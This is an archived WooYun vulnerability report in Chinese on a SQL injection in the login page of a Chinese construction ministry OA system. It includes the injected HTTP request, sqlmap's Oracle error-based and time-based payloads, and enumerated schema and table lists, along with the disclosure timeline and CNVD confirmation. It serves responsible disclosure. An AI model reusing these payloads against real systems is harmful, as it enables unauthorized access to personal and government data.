乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-27: 细节已通知厂商并且等待厂商处理中 2015-08-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-09: 细节向核心白帽子及相关领域专家公开 2015-09-19: 细节向普通白帽子公开 2015-09-29: 细节向实习白帽子公开 2015-10-14: 细节向公众公开
中国建设部某系统SQL注射(20库/可能泄露全国监管人员信息/各地级情况)
http://**.**.**.**/oa/login.jsp 存在POST注入 抓包
POST /oa/login.jsp?action=chklogin HTTP/1.1Host: **.**.**.**Content-Length: 29Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/oa/login.jsp?action=chkloginAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=014315ABBE9655F4CE7250B2098941A5username=aaaa%27&password=aaa
oracle的库好大泄露了全国的监管人员账号,可以查看各地区风景建设情况。
Database: CSMP[131 tables]+---------------------------+| BLOBTEST || CLOBTEST || COUNTVISITS || GH_AREADECLARE || GH_AREAPLANNING || GH_BASISCOMPILATION || GH_DECLARE || GH_DICT || GH_FACILITIES || GH_FACILITIESLEVEL || GH_OTHERINFO || GH_PLANNINGCHILD || JC_AREAOFOWNERSHIP || JC_BALANCEPAYMENTS || JC_SCENIC || JC_SMINFO || JC_STAFF || JC_SUPINFO || JC_TOURIST || JC_VILLAGE || JG_LOCATION || JG_POLYGONS || JG_REPORTED || JG_REVIEW || JG_SUBLOCATION || JG_TRIAL || JG_TUBAN || JIVEFORUM || JIVEFORUMPROP || JIVEGROUP || JIVEGROUPPERM || JIVEGROUPPROP || JIVEGROUPUSER || JIVEID || JIVEMESSAGE || JIVEMESSAGEPROP || JIVEMODERATION || JIVEREWARD || JIVETHREAD || JIVETHREADPROP || JIVEUSER || JIVEUSERPERM || JIVEUSERPROP || JIVEWATCH || KBNB_HOLIDAYSMONTHSREPORT || KBNB_PROJECTSTATISTICS || KBNB_YEARSREPORT || PLAN_TABLE || TBBCCOLUMN || TBBCCOLUMNBAK || TBBCCONFIG || TBBCFRIEND || TBBCOPERATION || TBBCPOWER || TBBCSCOLUMN || TBBCSMPERSON || TBBCSMUNIT || TBBCSMUNIT2011 || TBBCSMUNIT_INTERFACE || TBBCSMUNIT_SCZSI_ORI || TBBCSMUNIT_TOURISTSVOLUME || TBBCSUSERCOLUMNPOWER || TBBCUSER || TBBCUSERCOLUMNPOWER || TBBCUSERPOWER || TBBWANNUALREPORT || TBBWANNUALRT || TBBWAROFCONSTRUCT || TBBWAROFDEAL || TBBWAROFMANAGE || TBBWAROFUNIT || TBBWATTACHMENT || TBBWDIFFPLOTRECORDS || TBBWDISCUSS || TBBWFASTREPORT || TBBWFILEEXCHANGE || TBBWGOLDENFASTREPORT || TBBWIMPEACH || TBBWIMPEACHFEEDBACK || TBBWMATDOWNLOAD || TBBWNEWS || TBBWSNEWS || TBDWAPPLYTYPE || TBDWARSTATUS || TBDWARTYPE || TBDWATTACHMENTTYPE || TBDWBUSSINESSTYPE || TBDWEXCHANGETYPE || TBDWFRSTATUS || TBDWFRTYPE || TBDWGFRSTATUS || TBDWGFRTYPE || TBDWIMPEACHTYPE || TBDWNEWSSTATUS || TBDWOPERATOR || TBDWPLOTPROP || TBDWPRJTYPE || TBDWPROVINCE || TBDWSCTYPE || TBDWSMOBJTYPE || TBDWSMRESULTTYPE || TBDWSMTREATTYPE || TBDWSMTYPE || TBDWSMUNITTYPE || TBDWSOPERATOR || TBDWSTATUS || TBDWUSERTYPE || XMJS_EXPERTSOPINION || XMJS_PROJECTBASEINFO || XMJS_PROJECTBUILD || XMJS_PROVINCEREPORTED || XT_RESC || XT_USERRESC || XT_USERRESC666 || YC_HERITAGE || YC_HERITAGEAPPLAY || YC_HERITAGECHILD || YC_HERITAGECHILDDOC || YC_HERITAGECHILDTYPE || YC_HERITAGEHOLIDAYS || YC_HERITAGEHOLIDAYSDETAIL || YC_HERITAGELOCATION || YC_HERITAGEREADY || YC_HERITAGETOSCENIC || YC_HERITAGEUPLOAD || ZW_DECLARE || ZYHZ_INFO || ZYHZ_MSGM_INFO || ZYHZ_RWZY_GRADE || ZYHZ_ZRZY_GRADE || ZYHZ_ZRZY_TYPE |+---------------------------+[11:50:46] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 134 times[11:50:46] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\**.**.**.**'[*] shutting down at 11:50:46
当前库表
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: username (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: username=aaaa' AND 8819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(107)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8819=8819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)-- aHGR&password=aaa Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: username=aaaa' OR 1967=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(122)||CHR(102)||CHR(116),5)-- DkDJ&password=aaa---[11:52:11] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[11:52:11] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[11:52:11] [INFO] fetching database (schema) names[11:52:11] [INFO] the SQL query used returns 25 entriesavailable databases [25]:[*] CSMP[*] CTXSYS[*] HR[*] MDSYS[*] ODM[*] ODM_MTR[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] QS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] QS_OS[*] QS_WS[*] RMAN[*] SCOTT[*] SH[*] SYS[*] SYSTEM[*] WKSYS[*] WMSYS[*] XDB[11:52:11] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2 times[11:52:11] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\**.**.**.**'[*] shutting down at 11:52:11
所有库不深入了。。找出账号表段跑下即可
危害等级:高
漏洞Rank:13
确认时间:2015-08-30 07:14
CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.
暂无